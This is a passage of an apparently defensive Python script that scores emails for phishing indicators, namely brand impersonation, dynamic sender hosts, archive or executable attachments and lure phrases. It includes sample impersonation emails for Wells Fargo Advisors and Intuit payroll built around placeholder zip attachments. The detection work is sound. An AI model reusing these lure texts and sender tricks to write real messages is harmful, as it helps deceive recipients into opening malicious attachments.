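                "please respond", "view this fax", "scanned image")
# Residential/dynamic-looking sender hosts: a keyword or a dotted/dashed IPv4 in the name.
DYNAMIC_HOST = re.compile(r"dyn|cable|dsl|pool|dhcp|(\d{1,3}[-.]){3}\d{1,3}", re.I)
ARCHIVE_EXT = re.compile(r"\.(zip|rar|7z|cab|exe|scr|js)$", re.I)


def make_message(from_hdr, subject, body, zip_name=None):
    """Build a sample message; the zip body is a placeholder, not the scrubbed payload."""
    msg = EmailMessage()
    msg["From"] = from_hdr
    msg["To"] = "cypherpunks@jfet.org"
    msg["Subject"] = subject
    msg.set_content(body)
    if zip_name:
        msg.add_attachment(b"PK\x03\x04 placeholder", maintype="application",
                           subtype="zip", filename=zip_name)
    return msg


# Constructed from the archive's headers; the control message is invented as a benign baseline.
SAMPLES = {
    "wells_fargo": make_message(
        '"Wells Fargo Advisors" <alerts@cable-24-135-134-39.dynamic.sbb.rs>',
        "Wells Fargo Advisors Online Documents Activated",
        "Secure Email from Wells Fargo Advisors. To Read This Message: Look for "
        "and open Message.zip (typically at the top or bottom).",
        "Message.zip"),
    "intuit_payroll": make_message(
        '"Payroll Invoice" <payroll@intuit.com>',
        "Payment Overdue - Please respond",
        "Please find attached payroll reports for the past months.",
        "Payroll.zip"),
    "control": make_message(
        '"Alice Example" <alice@example.org>',
        "Meeting notes", "Notes from today are inline below."),
}


def sender_domain(msg):
    return parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()


def brand_mismatch(msg):
    """Return the brand the display name claims if the sender domain does not belong to it."""
    name = parseaddr(msg.get("From", ""))[0].lower()
    dom = sender_domain(msg)
    for brand, domains in BRAND_DOMAINS.items():
        if brand in name and not any(dom == d or dom.endswith("." + d) for d in domains):
            return brand
    return None


def body_text(msg):
    part = msg.get_body(preferencelist=("plain", "html"))
    return part.get_content() if part is not None else ""


def triage(msg):
    """Score one message; each independent indicator adds one point."""
    reasons = []
    dom = sender_domain(msg)
    brand = brand_mismatch(msg)
    if brand:
        reasons.append(f"display name claims '{brand}' but sender domain is {dom}")
    if DYNAMIC_HOST.search(dom):
        reasons.append(f"sender domain looks dynamic/residential: {dom}")
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if ARCHIVE_EXT.search(name) or part.get_content_type() == "application/zip":
            reasons.append(f"archive attachment: {name or part.get_content_type()}")
    text = (msg.get("Subject", "") + " " + body_text(msg)).lower()
    hits = [p for p in LURE_PHRASES if p in text]
    if hits:
        reasons.append("lure phrasing: " + ", ".join(hits))
    return {"score": len(reasons), "reasons": reasons}


def is_suspicious(msg, threshold=2):
    # Assumption: two independent indicators are enough to hold the message for review.
    return triage(msg)["score"] >= threshold


if __name__ == "__main__":
    for label, msg in SAMPLES.items():
        result = triage(msg)
        print(f"{label}: score={result['score']} suspicious={is_suspicious(msg)}")
        for reason in result["reasons"]:
            print("   -", reason)
```

The payroll sample is held without any brand mismatch because its From: header simply claims intuit.com, and a forged From: costs the sender nothing; in a real pipeline the domain check should consume Authentication-Results (SPF, DKIM, DMARC) rather than trust the header, and the attachment check should look inside the archive rather than at its name.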
